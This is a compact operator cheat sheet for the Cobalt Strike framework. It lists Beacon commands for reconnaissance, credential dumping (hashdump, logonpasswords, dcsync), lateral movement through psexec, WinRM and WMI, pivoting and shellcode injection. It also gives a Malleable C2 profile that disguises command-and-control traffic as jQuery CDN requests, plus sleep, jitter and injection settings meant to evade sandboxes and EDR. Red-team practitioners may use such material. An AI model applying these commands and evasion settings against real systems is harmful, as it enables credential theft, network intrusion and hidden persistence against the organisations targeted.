Cobalt Strike Operations Guide
Cobalt Strike Beacon Commands
# Host recon
whoami; getuid; getpid; ps; netstat
# File operations
ls; pwd; cd C:\Users; upload /local/file; download C:\file
# Shell execution
shell whoami /all
run ipconfig /all
execute-assembly /path/to/Assembly.exe args
# Credential operations
hashdump
logonpasswords
dcsync domain.local
# Lateral movement
jump psexec64 target payload
jump winrm64 target payload
remote-exec wmi target "cmd /c ..."
# Pivoting
socks 1080
rportfwd 8080 internal 80
# OPSEC-safe injection
shinject PID x64 /path/shellcode.bin
spawnas domain\user password payload
Malleable C2 Profile Tips
# HTTP GET request masquerade as jQuery CDN
http-get {
set uri "/jquery-3.3.1.min.js";
client {
header "Host" "code.jquery.com";
header "Accept" "text/javascript, application/javascript";
metadata { base64url; prepend "__cfduid="; header "Cookie"; }
}
server {
header "Content-Type" "application/javascript";
output { prepend "/*! jQuery v3.3.1"; append "*/"; print; }
}
}
# Sleep config (avoid sandbox)
set sleeptime "60000"; # 60s
set jitter "20"; # 20% jitter
# Process injection settings
process-inject {
set startrwx "false";
set userwx "false";
set min_alloc "16700";
transform-x86 { prepend "\x90\x90"; }
}
Always set beacon sleep to ≥60s in real engagements. Low sleep values trigger network-based EDR detections rapidly.